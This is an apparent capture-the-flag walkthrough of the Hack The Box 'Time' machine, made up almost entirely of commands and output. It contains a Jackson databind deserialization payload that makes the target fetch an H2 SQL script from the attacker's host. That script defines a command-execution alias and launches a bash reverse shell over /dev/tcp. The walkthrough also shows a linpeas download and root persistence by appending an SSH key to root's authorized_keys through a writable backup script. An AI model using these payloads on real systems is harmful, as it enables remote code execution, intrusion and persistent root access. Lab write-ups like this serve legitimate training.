Time

$ sudo nmap -p- -T4 -A 10.10.10.214
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
$ nikto -h http://10.10.10.214
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
$ dirb http://10.10.10.214
---- Scanning URL: http://10.10.10.214/ ----
==> DIRECTORY: http://10.10.10.214/css/                                                                           
==> DIRECTORY: http://10.10.10.214/fonts/                                                                         
==> DIRECTORY: http://10.10.10.214/images/                                                                        
+ http://10.10.10.214/index.php (CODE:200|SIZE:3813)                                                              
==> DIRECTORY: http://10.10.10.214/javascript/                                                                    
==> DIRECTORY: http://10.10.10.214/js/                                                                            
+ http://10.10.10.214/server-status (CODE:403|SIZE:277)                                                           
==> DIRECTORY: http://10.10.10.214/vendor/                                                                        
                                                                                                                  
---- Entering directory: http://10.10.10.214/css/ ----
                                                                                                                  
---- Entering directory: http://10.10.10.214/fonts/ ----
                                                                                                                  
---- Entering directory: http://10.10.10.214/images/ ----
==> DIRECTORY: http://10.10.10.214/images/icons/                                                                  
                                                                                                                  
---- Entering directory: http://10.10.10.214/javascript/ ----
==> DIRECTORY: http://10.10.10.214/javascript/jquery/                                                             
                                                                                                                  
---- Entering directory: http://10.10.10.214/js/ ----
                                                                                                                  
---- Entering directory: http://10.10.10.214/vendor/ ----
==> DIRECTORY: http://10.10.10.214/vendor/jquery/                                                                 
                                                                                                                  
---- Entering directory: http://10.10.10.214/images/icons/ ----
+ http://10.10.10.214/images/icons/favicon.ico (CODE:200|SIZE:32038)                                              
                                                                                                                  
---- Entering directory: http://10.10.10.214/javascript/jquery/ ----
+ http://10.10.10.214/javascript/jquery/jquery (CODE:200|SIZE:271809)                                             
                                                                                                                  
---- Entering directory: http://10.10.10.214/vendor/jquery/ ----

The site's JSON parser answers malformed input with a verbose, unhandled Java exception; the message discloses the library in use (Jackson databind), which is the information-disclosure weakness that the PoC below builds on:
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: No content to map due to end-of-input
PoC
sudo python3 -m http.server 80
sudo tcpdump -ni tun0 icmp

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.133/test.sql'"}]
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.214 - - [19/May/2021 08:17:04] "GET /test.sql HTTP/1.1" 200 -

test.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

test.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('ping -c 1 10.10.14.133')


kali@kali:~/0.htb/machines/Time214$ sudo tcpdump -ni tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
15:13:25.955134 IP 10.10.10.214 > 10.10.14.133: ICMP echo request, id 1, seq 1, length 64
15:13:25.955158 IP 10.10.14.133 > 10.10.10.214: ICMP echo reply, id 1, seq 1, length 64


sudo nc -lvnp 443
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.133/rev.sql'"}]
rev.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
   String[] command = {"bash", "-c", cmd};
   java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
   return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -c "bash -i >& /dev/tcp/10.10.14.133/443 0>&1"')

kali@kali:~/0.htb/machines/Time214$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.214] 59200
bash: cannot set terminal process group (848): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ 

python3 -c 'import pty;pty.spawn("bash")'
 ^Z
stty raw -echo; fg

pericles@time:/var/www/html$ ppyytthhoonn33  --cc  ''iimmppoorrtt  ppttyy;;ppttyy..ssppaawwnn((""bbaasshh""))''

pericles@time:/var/www/html$ ^Z
[1]+  Stopped                 sudo nc -lvnp 443
kali@kali:~/0.htb/machines/Time214$ stty raw -echo; fg
sudo nc -lvnp 443

pericles@time:/var/www/html$ 
pericles@time:/var/www/html$ cat /home/pericles/user.txt 
e03e50bb42c432875226647834ac4122
pericles@time:/var/www/html$

Shell as root — Enumeration
pericles@time:/dev/shm$ wget 10.10.14.133/linpeas.sh
pericles@time:/dev/shm$ chmod +x linpeas.sh 
pericles@time:/dev/shm$ ./linpeas.sh

[+] Interesting GROUP writable files (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files                                     
  Group pericles:                                                                                                  
/usr/bin/timer_backup.sh    
pericles@time:/dev/shm$ cat /usr/bin/timer_backup.sh 
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/dev/shm$

echo "echo 'ssh-rsa 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 kali@kali
' >> /root/.ssh/authorized_keys " >>/usr/bin/timer_backup.sh

pericles@time:/dev/shm$ cat /usr/bin/timer_backup.sh 
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo 'ssh-rsa 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 kali@kali
' >> /root/.ssh/authorized_keys 
pericles@time:/dev/shm$ 
kali@kali:~/0.htb/machines/Time214$ ssh root@10.10.10.214
The authenticity of host '10.10.10.214 (10.10.10.214)' can't be established.
ECDSA key fingerprint is SHA256:sMBq2ECkw0OgfWnm+CdzEgN36He1XtCyD76MEhD/EKU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.214' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 20 May 2021 02:28:08 PM UTC

  System load:             0.0
  Usage of /:              18.8% of 27.43GB
  Memory usage:            27%
  Swap usage:              0%
  Processes:               232
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.214
  IPv6 address for ens160: dead:beef::250:56ff:feb9:ead6


168 updates can be installed immediately.
47 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Feb  9 14:41:33 2021
root@time:~# 
root@time:~# cat root.txt 
ef379971aacb57b6fc51351c83b8fb98
root@time:~# 
